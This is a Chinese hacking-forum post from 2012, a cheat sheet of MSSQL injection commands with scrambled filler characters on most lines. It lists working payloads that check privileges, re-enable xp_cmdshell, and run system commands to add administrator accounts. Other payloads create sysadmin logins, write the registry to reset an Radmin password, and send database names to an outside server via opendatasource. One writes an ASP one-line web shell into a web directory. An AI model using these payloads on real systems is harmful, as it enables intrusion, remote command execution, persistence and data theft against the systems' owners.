找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2059|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的
4 K( c& B. T! [and 1=(Select IS_MEMBER('db_owner'))9 q/ V. n3 K2 i0 }& ^! I
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--: g, R+ P0 ^5 A8 f$ I) x; a

9 ^; g, l5 u2 P. c//检测是否有读取某数据库的权限
' I! U6 ^. J) B" [0 Hand 1= (Select HAS_DBACCESS('master')). _5 S; |$ \/ z
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
: V$ Z& \% b+ v/ p% U& j# ~6 u: e! ]! p9 m/ X7 @: C

5 |0 w( l2 ^& a数字类型
% j& V! Y6 M& S$ D) oand char(124)%2Buser%2Bchar(124)=0. f0 S' e! |( B' q3 k
5 m0 W7 R) `, a0 I* T. \0 [
字符类型
2 P1 Z3 M( L4 C' and char(124)%2Buser%2Bchar(124)=0 and ''='
1 \- l1 }$ ^/ @$ }3 a% Y: c  ~7 `+ F/ X: P2 \! E2 P
搜索类型: U$ ~0 y  B5 j' y! |. k6 [5 `1 x
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
9 x4 \6 P; b: i! d& S
3 N5 r: B- L8 Q5 h; V爆用户名
, g" F4 C" K/ ~. F5 Eand user>0; r& ?  H9 R$ n$ Q$ R2 T8 }
' and user>0 and ''='- ^; N8 y, m3 Q# D

, S+ Y0 D$ F6 j! l+ ^检测是否为SA权限- o9 b1 v: d% m. w$ l' v( X( L
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--# K. m2 S: q. @) C, ^
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
: O3 I; X9 G5 |+ D% \, \( k4 p
. ]# I0 `1 `1 v2 \检测是不是MSSQL数据库
* M, e, {$ Q& b- W$ ?" u# Zand exists (select * from sysobjects);--
' L( g$ K  ~( N5 G6 F( B5 C% F" E
! |" W  H- B' ?' }检测是否支持多行0 H+ @7 s( @* ?0 ?! W
;declare @d int;--
' p2 d1 B6 @4 a' e$ b8 G1 e& d/ _+ k0 E7 @" w, z! B
恢复 xp_cmdshell9 F3 Z3 C* a; y8 }9 {2 O; @! b
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
/ F3 e9 k" `3 f; I" m  i! f0 C) G' _  F- J) ]9 V6 C: N
! |/ _$ b7 _7 l$ s, X
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
0 Z; {" P& s4 E9 x9 N& |% f2 u' f4 i3 t
//-----------------------* F5 o$ {! j& N) t5 M+ h: `
//       执行命令" |- S6 K9 g4 t' h( A
//-----------------------
0 }& f4 F1 Z& X; m1 {2 j首先开启沙盘模式:6 k7 z: g+ E! _- P  a2 A
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
, D; p8 a! V: m$ c  i" f! F. Y
6 E9 m  T) G# q) D6 l0 J5 I+ K3 |然后利用jet.oledb执行系统命令" `: `6 |" c- c  l- y
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')9 q" S2 \# }$ ~' A: P
, K; o  \0 x6 K* n! G- v/ ]5 [
执行命令  \! {! Q% z) Z- L# K
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
. R* T1 n0 ^' C7 i, }; p/ E  W! Q( H4 Q8 G2 P8 _$ U5 E
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; T% O! b* U6 ~; l/ l. C" T
' @9 C! W2 ?# y( Q* J3 m. s判断xp_cmdshell扩展存储过程是否存在:& d' O) p( F- e, Q
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
, N4 E$ y5 w& W# G# |$ s6 e- B
4 `0 g0 u% h  @写注册表# x2 c( D8 ^. V- V, I7 n3 o
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& j# ^2 }/ y8 P( J7 n

3 }$ Q) ]+ A0 x4 w, xREG_SZ
* H5 l* t7 Q( `) d; N7 M. V5 B# i0 t- E, w( u( f; s; W
读注册表
  a. x. ?6 L6 N1 Y( j1 f! ?exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
% \8 S7 t" I8 q" {1 Z/ E1 E. Q( d3 A& M( Q9 B) X5 }5 y) U
读取目录内容
1 ^0 R1 X5 i# u& a: u8 uexec master..xp_dirtree 'c:\winnt\system32\',1,1
% U3 I% u: k) w! U5 g' ^: a' ]" j0 ~2 B4 Y: M2 O, m# f) C

! u+ k* W: D5 c( z9 p" d数据库备份
- T/ _" n5 M" g& B* W/ qbackup database pubs to disk = 'c:\123.bak'
9 H6 W4 s* L- t; W! |3 [9 M5 z  O; z; q) e5 s8 C$ i
//爆出长度
8 ?% Y, j4 v  t9 r$ y5 W5 ~And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--6 R* X0 a  L8 N' i- }7 p  G
4 @" ?5 _! C3 Z% P, k  @$ V
# l6 E. G: ?- F' u6 A( S
  k+ a# ~( [2 Y  Q
更改sa口令方法:用sql综合利用工具连接后,执行命令:6 N7 r/ |/ p+ k: M. Y; y+ T' s" i
exec sp_password NULL,'新密码','sa'. S9 S. R  |/ ^( k; F
' P1 G* [( L8 s$ r9 i$ T" V- y; \
添加和删除一个SA权限的用户test:
4 Q* e2 d( ~( Q+ n% O/ B% qexec master.dbo.sp_addlogin test,9530772
) ?: N, e, f" z& k' wexec master.dbo.sp_addsrvrolemember test,sysadmin# E3 s8 D$ k6 P  w
4 x% |8 o- r! v% C. a: q: k
删除扩展存储过过程xp_cmdshell的语句:& S: g0 T% _3 K. N1 d
exec sp_dropextendedproc 'xp_cmdshell'
' K# d: J' i0 K+ \9 j/ p4 ~# U) \; F) @+ b. p) Z3 B8 b
添加扩展存储过过程
( ~5 D6 Q9 u& n4 K$ JEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
6 c9 r+ c7 D5 A7 lGRANT exec On xp_proxiedadata TO public! n$ H+ H/ }5 R4 A' ^3 L
2 t! u3 R' b5 g2 t
9 n, X+ N1 \3 H8 ^; n0 p
停掉或激活某个服务。- |( Q9 s- q5 Y) Y

+ f& v+ T; M) [* [7 bexec master..xp_servicecontrol 'stop','schedule'3 x. I( z! V+ w- u8 h1 m: ^
exec master..xp_servicecontrol 'start','schedule'- G$ s0 S$ d) a( e* n

: _. v: k( j0 ]! W: S4 r, Ndbo.xp_subdirs) B+ Y" K3 J& D/ [9 E, w7 @, l% `
% X  q1 ^* x5 }0 Q# _
只列某个目录下的子目录。
" _* B& Q$ L. j; n1 |; Z3 nxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'& g7 C9 \/ s  v9 H1 U# }
# m1 ]* [# ?" v/ ]
dbo.xp_makecab
1 U3 z" g) e7 u0 K$ f
% P1 y. [/ i" |2 v$ ^3 W5 \1 o$ P# V将目标多个档案压缩到某个目标档案之内。( A, }- `; L, Y1 h
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。( h2 {, t6 w& V

; ?3 Y* `- m: C# N+ rdbo.xp_makecab
$ G8 \  @" i. d6 b  }  l'c:\test.cab','mszip',1,
/ B: n6 F6 Z1 S. t& c0 F  r'C:\Inetpub\wwwroot\SQLInject\login.asp',. y& [2 O* f: f! U' ]3 C1 G
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp', k4 b" B* A9 N5 O0 I  C

  l) H; d" S# G- h; g! [9 B, Hxp_terminate_process
# `7 q5 v. M; o- _" l
2 V# u( m8 Z. G/ {6 ^  Y' R& l停掉某个执行中的程序,但赋予的参数是 Process ID。8 n9 d* B1 k/ [0 [. L
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID) y1 N+ Z; u3 V) G3 J7 d! s4 E

  [* w% i3 I: @' F- Y4 ]xp_terminate_process 2484. Y: X  Q9 R& [/ K
4 s6 S; l; v' ?# e3 x+ L% m% a( P
xp_unpackcab  Y5 j5 p5 u" O7 _" k# E$ `8 g
. k$ u; z6 Y6 U5 _) w4 {5 \0 T
解开压缩档。
* J+ G% t2 ]$ Q( z2 R8 b$ G$ Z5 Y4 B' B
xp_unpackcab 'c:\test.cab','c:\temp',1: @) ^5 y# T0 J9 Y: I5 {5 H
3 \/ F; x# u3 U2 w

: I6 D$ x% L  o" t6 g2 x: X某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
6 F% u! z) x( N2 ]' E6 y8 {" y
) }+ t4 s; m. U" Vcreate database lcx;# _( `3 [, v' {4 r
Create TABLE ku(name nvarchar(256) null);: T6 u/ N7 p* w. f* [5 k# Y
Create TABLE biao(id int NULL,name nvarchar(256) null);" a! G  @" r; I, p! O3 i" X' F5 _8 s
8 ]) V2 V, O, N2 N3 [: ]7 g
//得到数据库名, g! x$ }, U  W0 l8 M! o$ z" I
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
- M" S) i5 _4 O  o6 K7 \0 @+ E1 r( {$ h, d# N

3 g( i: q7 f# n//在Master中创建表,看看权限怎样: C( T2 N' c# `2 }. R/ P( `
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--* y  W- \  j. l' J1 j: Z$ l

$ e. r2 Z; ]" G5 L( d- p7 _用 sp_makewebtask直接在web目录里写入一句话马:
" ?( X; M8 ~) j# v$ ?% phttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--! Q2 h( \- E3 b

: _1 f0 ]& b1 P4 w& L//更新表内容
1 R$ p& S9 H; {Update films SET kind = 'Dramatic' Where id = 1237 k9 \, d: @1 n) [

8 f+ n2 P6 \5 o0 ?. v! V//删除内容8 J/ ?5 o7 `# v* a2 e+ n
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表